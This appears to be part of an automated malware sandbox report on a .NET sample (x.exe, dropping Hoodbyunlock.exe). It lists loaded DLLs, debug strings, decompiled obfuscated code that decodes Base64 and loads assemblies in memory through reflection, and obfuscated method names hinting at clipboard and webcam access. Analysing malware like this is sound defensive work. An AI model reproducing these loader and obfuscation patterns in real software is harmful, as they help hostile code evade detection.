                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: textinputframework.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: coreuicomponents.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: coremessaging.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: ntmarta.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: coremessaging.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: avicap32.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: msvfw32.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: winmm.dll
                      Source: C:\Users\user\Desktop\x.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
                      Source: Hoodbyunlock.lnk.7.dr | LNK file: ..\..\..\..\..\..\..\..\..\ProgramData\Hoodbyunlock.exe
                      Source: Window Recorder | Window detected: More than 3 window changes detected
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                      Source: x.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: x.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: System.Xml.ni.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: x.exe, 00000007.00000002.3111404709.0000000000AD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb` source: x.exe, 00000007.00000002.3111404709.0000000000A4B000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.ni.pdbRSDS source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: lib.pdb source: x.exe, 00000007.00000002.3111404709.0000000000AD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Windows.Forms.ni.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: System.Drawing.ni.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: System.Configuration.ni.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: mscorlib.pdbL+ source: x.exe, 00000007.00000002.3113363388.000000001B807000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: x.exe, 00000007.00000002.3113829594.000000001BF88000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: System.Configuration.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: symbols\dll\mscorlib.pdbpdb` source: x.exe, 00000007.00000002.3113829594.000000001BF88000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: System.Drawing.ni.pdbRSDS source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: System.Xml.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: System.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: 0C:\Windows\mscorlib.pdb source: x.exe, 00000007.00000002.3113829594.000000001BF88000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: System.Xml.ni.pdbRSDS# source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: Microsoft.VisualBasic.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: System.Core.ni.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: x.exe, 00000007.00000002.3113829594.000000001BF88000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: System.Windows.Forms.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: mscorlib.pdb.> source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: mscorlib.pdb source: x.exe, 00000007.00000002.3113363388.000000001B750000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000007.00000002.3111404709.0000000000A4B000.00000004.00000020.00020000.00000000.sdmp, WER93E4.tmp.dmp.11.dr
                      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: x.exe, 00000007.00000002.3113363388.000000001B7D3000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: System.Drawing.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: System.Management.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: mscorlib.ni.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: System.Management.ni.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: x.exe, 00000007.00000002.3113363388.000000001B7D3000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Core.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: System.Configuration.pdbH source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: indoC:\Windows\mscorlib.pdb source: x.exe, 00000007.00000002.3113829594.000000001BF88000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: System.ni.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: System.Core.ni.pdbRSDS source: WER93E4.tmp.dmp.11.dr

                      Data Obfuscation

                      Source: x.exe.6.dr, dVvs1XNmsaLNa04pa.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.hctFYntEyoMgB8hZd9xGjKiH4UxZ9kZA,tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.OKr7zS8MQMacXeqK3iev2eaTr2vacnGn,tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.NJxpGPl7YQpHngjsp7M7TU6YMY0cu1La,tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.HTzj12LlhNe5SbtvC0D5NV0eE8IEM8E7,UAKhR7NJbD3KWn0Nd.URj8adqUn7sVUtnpu()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: x.exe.6.dr, dVvs1XNmsaLNa04pa.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{cmLBX7vu99RPL0GFG[2],UAKhR7NJbD3KWn0Nd.dKXd5zfpfc7tYe29X(Convert.FromBase64String(cmLBX7vu99RPL0GFG[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: x.exe.6.dr, dVvs1XNmsaLNa04pa.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { cmLBX7vu99RPL0GFG[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 6.3.cscript.exe.2a3f8d843d0.3.raw.unpack, dVvs1XNmsaLNa04pa.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.hctFYntEyoMgB8hZd9xGjKiH4UxZ9kZA,tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.OKr7zS8MQMacXeqK3iev2eaTr2vacnGn,tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.NJxpGPl7YQpHngjsp7M7TU6YMY0cu1La,tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.HTzj12LlhNe5SbtvC0D5NV0eE8IEM8E7,UAKhR7NJbD3KWn0Nd.URj8adqUn7sVUtnpu()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 6.3.cscript.exe.2a3f8d843d0.3.raw.unpack, dVvs1XNmsaLNa04pa.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{cmLBX7vu99RPL0GFG[2],UAKhR7NJbD3KWn0Nd.dKXd5zfpfc7tYe29X(Convert.FromBase64String(cmLBX7vu99RPL0GFG[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 6.3.cscript.exe.2a3f8d843d0.3.raw.unpack, dVvs1XNmsaLNa04pa.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { cmLBX7vu99RPL0GFG[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 6.3.cscript.exe.2a3f8d843d0.1.raw.unpack, dVvs1XNmsaLNa04pa.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.hctFYntEyoMgB8hZd9xGjKiH4UxZ9kZA,tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.OKr7zS8MQMacXeqK3iev2eaTr2vacnGn,tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.NJxpGPl7YQpHngjsp7M7TU6YMY0cu1La,tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.HTzj12LlhNe5SbtvC0D5NV0eE8IEM8E7,UAKhR7NJbD3KWn0Nd.URj8adqUn7sVUtnpu()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 6.3.cscript.exe.2a3f8d843d0.1.raw.unpack, dVvs1XNmsaLNa04pa.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{cmLBX7vu99RPL0GFG[2],UAKhR7NJbD3KWn0Nd.dKXd5zfpfc7tYe29X(Convert.FromBase64String(cmLBX7vu99RPL0GFG[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 6.3.cscript.exe.2a3f8d843d0.1.raw.unpack, dVvs1XNmsaLNa04pa.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { cmLBX7vu99RPL0GFG[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 6.3.cscript.exe.2a3f936cf80.5.raw.unpack, dVvs1XNmsaLNa04pa.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.hctFYntEyoMgB8hZd9xGjKiH4UxZ9kZA,tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.OKr7zS8MQMacXeqK3iev2eaTr2vacnGn,tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.NJxpGPl7YQpHngjsp7M7TU6YMY0cu1La,tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.HTzj12LlhNe5SbtvC0D5NV0eE8IEM8E7,UAKhR7NJbD3KWn0Nd.URj8adqUn7sVUtnpu()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 6.3.cscript.exe.2a3f936cf80.5.raw.unpack, dVvs1XNmsaLNa04pa.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{cmLBX7vu99RPL0GFG[2],UAKhR7NJbD3KWn0Nd.dKXd5zfpfc7tYe29X(Convert.FromBase64String(cmLBX7vu99RPL0GFG[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 6.3.cscript.exe.2a3f936cf80.5.raw.unpack, dVvs1XNmsaLNa04pa.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { cmLBX7vu99RPL0GFG[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 6.3.cscript.exe.2a3f8d843d0.2.raw.unpack, dVvs1XNmsaLNa04pa.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.hctFYntEyoMgB8hZd9xGjKiH4UxZ9kZA,tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.OKr7zS8MQMacXeqK3iev2eaTr2vacnGn,tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.NJxpGPl7YQpHngjsp7M7TU6YMY0cu1La,tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.HTzj12LlhNe5SbtvC0D5NV0eE8IEM8E7,UAKhR7NJbD3KWn0Nd.URj8adqUn7sVUtnpu()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 6.3.cscript.exe.2a3f8d843d0.2.raw.unpack, dVvs1XNmsaLNa04pa.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{cmLBX7vu99RPL0GFG[2],UAKhR7NJbD3KWn0Nd.dKXd5zfpfc7tYe29X(Convert.FromBase64String(cmLBX7vu99RPL0GFG[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 6.3.cscript.exe.2a3f8d843d0.2.raw.unpack, dVvs1XNmsaLNa04pa.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { cmLBX7vu99RPL0GFG[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Hoodbyunlock.exe.7.dr, dVvs1XNmsaLNa04pa.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.hctFYntEyoMgB8hZd9xGjKiH4UxZ9kZA,tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.OKr7zS8MQMacXeqK3iev2eaTr2vacnGn,tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.NJxpGPl7YQpHngjsp7M7TU6YMY0cu1La,tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.HTzj12LlhNe5SbtvC0D5NV0eE8IEM8E7,UAKhR7NJbD3KWn0Nd.URj8adqUn7sVUtnpu()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Hoodbyunlock.exe.7.dr, dVvs1XNmsaLNa04pa.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{cmLBX7vu99RPL0GFG[2],UAKhR7NJbD3KWn0Nd.dKXd5zfpfc7tYe29X(Convert.FromBase64String(cmLBX7vu99RPL0GFG[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Hoodbyunlock.exe.7.dr, dVvs1XNmsaLNa04pa.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { cmLBX7vu99RPL0GFG[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 7.2.x.exe.128a1a78.1.raw.unpack, dVvs1XNmsaLNa04pa.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.hctFYntEyoMgB8hZd9xGjKiH4UxZ9kZA,tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.OKr7zS8MQMacXeqK3iev2eaTr2vacnGn,tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.NJxpGPl7YQpHngjsp7M7TU6YMY0cu1La,tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.HTzj12LlhNe5SbtvC0D5NV0eE8IEM8E7,UAKhR7NJbD3KWn0Nd.URj8adqUn7sVUtnpu()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 7.2.x.exe.128a1a78.1.raw.unpack, dVvs1XNmsaLNa04pa.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{cmLBX7vu99RPL0GFG[2],UAKhR7NJbD3KWn0Nd.dKXd5zfpfc7tYe29X(Convert.FromBase64String(cmLBX7vu99RPL0GFG[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 7.2.x.exe.128a1a78.1.raw.unpack, dVvs1XNmsaLNa04pa.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { cmLBX7vu99RPL0GFG[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: x.exe.6.dr, dVvs1XNmsaLNa04pa.cs .Net Code: kQDJ059RzJMZ4crRs System.AppDomain.Load(byte[])
                      Source: x.exe.6.dr, dVvs1XNmsaLNa04pa.cs .Net Code: ok69o9SxhgTvypW4B System.AppDomain.Load(byte[])
                      Source: x.exe.6.dr, dVvs1XNmsaLNa04pa.cs .Net Code: ok69o9SxhgTvypW4B
                      Source: 6.3.cscript.exe.2a3f8d843d0.3.raw.unpack, dVvs1XNmsaLNa04pa.cs .Net Code: kQDJ059RzJMZ4crRs System.AppDomain.Load(byte[])
                      Source: 6.3.cscript.exe.2a3f8d843d0.3.raw.unpack, dVvs1XNmsaLNa04pa.cs .Net Code: ok69o9SxhgTvypW4B System.AppDomain.Load(byte[])
                      Source: 6.3.cscript.exe.2a3f8d843d0.3.raw.unpack, dVvs1XNmsaLNa04pa.cs .Net Code: ok69o9SxhgTvypW4B
                      Source: 6.3.cscript.exe.2a3f8d843d0.1.raw.unpack, dVvs1XNmsaLNa04pa.cs .Net Code: kQDJ059RzJMZ4crRs System.AppDomain.Load(byte[])
                      Source: 6.3.cscript.exe.2a3f8d843d0.1.raw.unpack, dVvs1XNmsaLNa04pa.cs .Net Code: ok69o9SxhgTvypW4B System.AppDomain.Load(byte[])
                      Source: 6.3.cscript.exe.2a3f8d843d0.1.raw.unpack, dVvs1XNmsaLNa04pa.cs .Net Code: ok69o9SxhgTvypW4B
                      Source: 6.3.cscript.exe.2a3f936cf80.5.raw.unpack, dVvs1XNmsaLNa04pa.cs .Net Code: kQDJ059RzJMZ4crRs System.AppDomain.Load(byte[])
                      Source: 6.3.cscript.exe.2a3f936cf80.5.raw.unpack, dVvs1XNmsaLNa04pa.cs .Net Code: ok69o9SxhgTvypW4B System.AppDomain.Load(byte[])
                      Source: 6.3.cscript.exe.2a3f936cf80.5.raw.unpack, dVvs1XNmsaLNa04pa.cs .Net Code: ok69o9SxhgTvypW4B
                      Source: 6.3.cscript.exe.2a3f8d843d0.2.raw.unpack, dVvs1XNmsaLNa04pa.cs .Net Code: kQDJ059RzJMZ4crRs System.AppDomain.Load(byte[])
                      Source: 6.3.cscript.exe.2a3f8d843d0.2.raw.unpack, dVvs1XNmsaLNa04pa.cs .Net Code: ok69o9SxhgTvypW4B System.AppDomain.Load(byte[])
                      Source: 6.3.cscript.exe.2a3f8d843d0.2.raw.unpack, dVvs1XNmsaLNa04pa.cs .Net Code: ok69o9SxhgTvypW4B
                      Source: Hoodbyunlock.exe.7.dr, dVvs1XNmsaLNa04pa.cs .Net Code: kQDJ059RzJMZ4crRs System.AppDomain.Load(byte[])
                      Source: Hoodbyunlock.exe.7.dr, dVvs1XNmsaLNa04pa.cs .Net Code: ok69o9SxhgTvypW4B System.AppDomain.Load(byte[])
                      Source: Hoodbyunlock.exe.7.dr, dVvs1XNmsaLNa04pa.cs .Net Code: ok69o9SxhgTvypW4B
                      Source: 7.2.x.exe.128a1a78.1.raw.unpack, dVvs1XNmsaLNa04pa.cs .Net Code: kQDJ059RzJMZ4crRs System.AppDomain.Load(byte[])
                      Source: 7.2.x.exe.128a1a78.1.raw.unpack, dVvs1XNmsaLNa04pa.cs .Net Code: ok69o9SxhgTvypW4B System.AppDomain.Load(byte[])
                      Source: 7.2.x.exe.128a1a78.1.raw.unpack, dVvs1XNmsaLNa04pa.cs .Net Code: ok69o9SxhgTvypW4B
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 7_2_00007FF847022458 push ebx; iretd 7_2_00007FF8470224CA
                      Source: x.exe.6.dr, ZdLTnuqgOY3k2FQWh.csHigh entropy of concatenated method names: 'QN1t9tXhLhv98EXG7', 'X2y7W9fadgS4DyzNa', 'rK1gTQvr57y1qvnmT', 'LkJsXVRufF1n3PJ76lQAfBskMFNm6LJadKJ1zMIMvqtXkmfgN8GGhgkV2wx7ufqcWRR', 'DWRBoOvnp5ZOvNWvTay4uj94xbk1oDZRBZG7727S2NIL2AEJHJpuwYnGdjWyKfm4Cxo', '_6Cr4EeyxsmAuQpTyEMOMMmtzk4y7c5Pdv3TCzx6AO6yb91EutxpUtaRJZvGthQYiefE', '_7KlSkePwTyZRIZ7PaYrBOI5CMKlMVkfem7GTv8dDwKW8ctC2cMd5sjZqKPSzjKdXfDV', '_1DsqMjnSaA94ZFTw5SBCfVNeAlQrz4KUbcMgXjprzn3KoxHvZ8zEt5bx2O6ofYajP1o', 'IMEai2g1ONuNsx6nnS9sh9H21ljAQJd4wYOCM8Q6sSRL8pMMhrrgGgiSqVyGxJ8qYDn', 'ECraczxHUSC3tua1ouB2OJXo70Rs4XTHxKCKkLtFMOzYb9EH7gPa1PxtSVCNIlWP1Mk'
                      Source: x.exe.6.dr, 8Jaf9UAvzEGq55typT6Pkhartwa1iUVp.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'gRmA0Fs4Fj8m2cxWH', 'Ql4cwKZRPDBaZnipS', 'O8f8MK31AfQEJkAv2', 'APdUl99vAUyyXAAFu'
                      Source: x.exe.6.dr, GVhN53QgxWl6tpiCd.csHigh entropy of concatenated method names: 'RegexResult', 'WndProc', 'A6Uhc606QwQ0Zm0HK4Ozk9B8xlClcf2XfewKRB3wrkM5rVhhGkQQQm7gBYl5BTS8oYUncI29SP8SGjvRLM', 'Y5HcfhXIhGhXVEcVey7z4Lc342CyAMYjaPJYZnn3oqkEmcQSrVU4Q3B88ViFqwuWAqZvRSgbsjFYarIH1p'
                      Source: x.exe.6.dr, hxJwBk8Rp0X6e7PsRDJpGmVPrHx4gBMq.csHigh entropy of concatenated method names: 'M6Pjt09GsWfanRtalnXtJmRxwU16H1g4', 'e6uulpEWxKtDSm0IjZ09pto4x9dIvT0w', '_7WTE8oFH4vwm4x5y202KWqe0ysgpdDu7', 'kbHWNnZ0VwNXYUtCFgAPENDrHTYQAuNH', 'XDg1kNFyH7AXOgoWsq5365MC30QxDnDx', '_4sSTo4uCL8fSjnwfgDoAfdpLQjPJRXa3', 'gl8iadDaKZylRyk425kdkxJ1MnngITIL', 'hY5kUOHes2aO7a2xNznbkJOnNioRDoGR', '_87Eqs9hvQSfBcuJpAYwQiGDBch4J6oid', '_6rYeKKqczmMMjWoeIiacm1JPn48cqxyI'
                      Source: x.exe.6.dr, dVvs1XNmsaLNa04pa.csHigh entropy of concatenated method names: '_2paFzAijsDRdnCKoS', 'kQDJ059RzJMZ4crRs', 'LMYT5QeAxwNEAEQyD', 'vuoG9Qw4yj5Ea7Rtk', 'RKcu55oqataXXogwd', 'uk0lLV07kANck3Amt', 'mpku9WcyRNohRTvls', 'PKbSuPgiRvoxMmlXu', 'nKRMHesIk5vtTkuKR', 'MpQfw3OoR7IsyK9UY'
                      Source: x.exe.6.dr, UAKhR7NJbD3KWn0Nd.csHigh entropy of concatenated method names: 'iuxc2Jn7e7nsqLksF', 'OpNm66LKdpnHllqo9', 'Ml9nM3AyoYUue0XRF', 'D0EtLe0PN51VuAfio', 'm3QloB4lgsW9zeGK0', 'pjueMtEmIpYwcD5V1', 'fALBbecRaEfyZw3tB', '_79CkwlVc3CtOCWoBe', 'tb0sOrxbVf181Ira8', 'HD37clOuJb4gwNcKh'
                      Source: x.exe.6.dr, ktUwZuVPUn1uLnrpF.csHigh entropy of concatenated method names: 'r5ehq0TQjJBz68rR8', 'QnSBBigt3JbpBIcqY9y2vHZ6sgLzWr9ojuMViGfVWBcyUGpOXlmsPmCjP8fIOAcxFgoQL0YdxnI9yqghks', 'VSFnEbXioI2mKeCHHSkNIy3YfOVmwaPF3V6OuntSu885YZTE2FgKeEYvWoFahotlJnFKSYqFQMhOaTie15', 'k7zNPAHAbolvUoiRjwosNMML6wZoj5vTpZzf6XasIQc969qsYKTDsFIcFvZJGr9LAYX8Ac0F8F62sv52lg', 'HmDpdgze425todh9IXctabQNoP8p4QdKuMVRAB6Zx1XSRQHespvrBzGkgSb4QJluB1ZaU0aXYos3zJYnbc'
                      Source: x.exe.6.dr, bRv5O3fSB18gLSRt9.csHigh entropy of concatenated method names: 'smksmczVmWBEJfyBP', 'j2w2bSDFvXcjvXugO', '_1wu2TMKAHwLqmgw4rRoINBl0v0Q11LgQIgrshFE8r0jb83sWx2eTS7X0jck48xfJkMkEkRYwFq4ktLkgxR', 'CFCGhrg4ddiKj09LfGQA0WlxfpeTCAaHUSc7ewPfgamIcgkJmHKs6SqcKRC56H25kqi79TPEPYEySRA1L5', 'Qmb01m7kmJdvWvm0K4Y08f8oBwndyX4oIfNRQrX2NgY0phtlCtL7JUqncsw8JnFClRyaIsXmzDKCudztky', 'vYaYQeVg5xsFbsakW741PvOrJOf3sn19cSBhDWDFtCLm9yinHZ3LZBoqTnDER5qpySRWanWjM7WpB6HOYR'
                      Source: x.exe.6.dr, 71HgZZRenc3pCrs5cwSvoic61CqCAuZ8.csHigh entropy of concatenated method names: 'q7pAZzZ3EnDiRJA6CNudmPgpuGbGtzpV', 'CkT357DsXaHLKIXTIhRm4kN0H24oG2FD', 'nJzVTyPvta5afVyiFSidm4GqBFgW7f9g', 'tLIlAAnoafWpdOaoRWhdFg6l4dseJWWx', 'YET2lYIFTsgJpoPEOdBScEDdRgzldShF', 'L6BGSE4pwNi71UDsMK6klIUnSmANhFmw', 'cvzy5SNuRaLgmVERLhgSyzDYVr4LVZd4', 'tVVnHrcxEBkzo1zE6jhNwNnotPTZSzXj', '_8xyl6DFq166NLZUgwWo4mmWQkKl4d9DF', 'rwQZIKpAzdG74MTjcPhc0ME4fzTwgZSX'
                      Source: x.exe.6.dr, GXHRyrck0HnRoIRVg.csHigh entropy of concatenated method names: 'H3d6de69oR3hKhOMF', 'PhLmFVcQl3QkZyLzU', '_0TAO5Rsvxq9hzGOHj', 'hkoXtS7v1o1Lef3Gg', 'EesGi649DqUXimQnP8LOo13R6JvL2okzjhNemMjvknVdKmJ2GcbBTlVqL129fAMVsxSZRKQbkkgiZk1Kba', 'khPGLbg46ec6YHwaaD1ctwXsCnUDeYzHybkSaqJCcabz9Mvlo11Jw6fZjjMsRZdEfi2GoTDZyJhdr5AwmW', 'ONZCRP2BVNthbERN5mHt6qCJ9YuDq1lz5xR0EOVlZhx2ReKqNzcj2aOk7BR5WtrHttLMYgtp7pPe2RQhMm', '_2MIhGHTjOP3HS1WYi2JRTfTBCKHGj6LKeSylOF679UubLjKh8R6oNH9ZTWu6k4z1NzysQKAxTxDti4bUbm', 'GiCVAfCZlR4DR4eU8Z6NOt9xE25VDaoeytXt9JC1RhbBkKqgeFmcpqJsOkxRAfU6LzqzvwVvR8SmQrJJZl', '_06FgkZyQ6qKa6EBqZ0SRn2aSy9aaZNXsUVIep2s0y0TwrkNqpIv8gjSA6XOeMCsktxOujuNwFm1fOhU4ru'
                      Source: x.exe.6.dr, 8oKYND99avZqdoU5T.csHigh entropy of concatenated method names: 'KyPhJhKVrFVArWuxw', 'PQ8qqiFBLASb2FLzqrnN46HS69ygJNaOOQlMwXpIWU2SKE5rznDYbOUhiCsPYdMPC0MECV1YQi1qGk5Iup', '_9gAulm5e8maJgutrMhxwthm4lzCqQpF0KCitRHiYwH831dNo1uUC5G39BcsxHM2BsMs4eNNpcCyRY7qHNj', 'zGPfrZccwieTHXHnSP0iLyDL6jwyBkyMFrIgTTfDcciXXAAIfIbGYsZz2X94sSUBvmDf3sdHuKBYAFDK4G', 'EitRvQvAGcep1Bt7DjDI0KwSBiB6169EbtD2qI1CZRsWl63XNC2qUBExz0H0ivtM2gNfRY1lfOS4nRdBiV'
                      Source: x.exe.6.dr, y9w99ZmeIXuttmqO5.csHigh entropy of concatenated method names: 'AddClipboardFormatListener', 'SetParent', '_3kuUQ6D859FcECMAW', 'QgYdRiaf38MhnznUlpxjDWzd0koDOaVwqOdFYGDNGzFn6bjwp3UpijxM4zpWvMK4SY4cXjhrkdVAe2nPyt', '_3eiiVv8u9xN1WSgJWAhnNWNQMnJOxABF1zg3Jg6XnQge2tfZsyyIn3fFtIv5SLvPsTUO9uTJdpRUGhoY9F', 'qWiINr7fQVvakV8gHNZYqLqeFMYaLXEJxSTrr5Q9K8IdwsVVeqg0HRQEAxelT7DsaglEB18iPwEYo80mIK', 'k0sfNA0h1lQs4gZEiXmJUJXzf7KegJ64WqDZSlWizXHsLr3tBUg8xN3RhdyryYJu9ejcFXQo1RrQGE0Aoi'
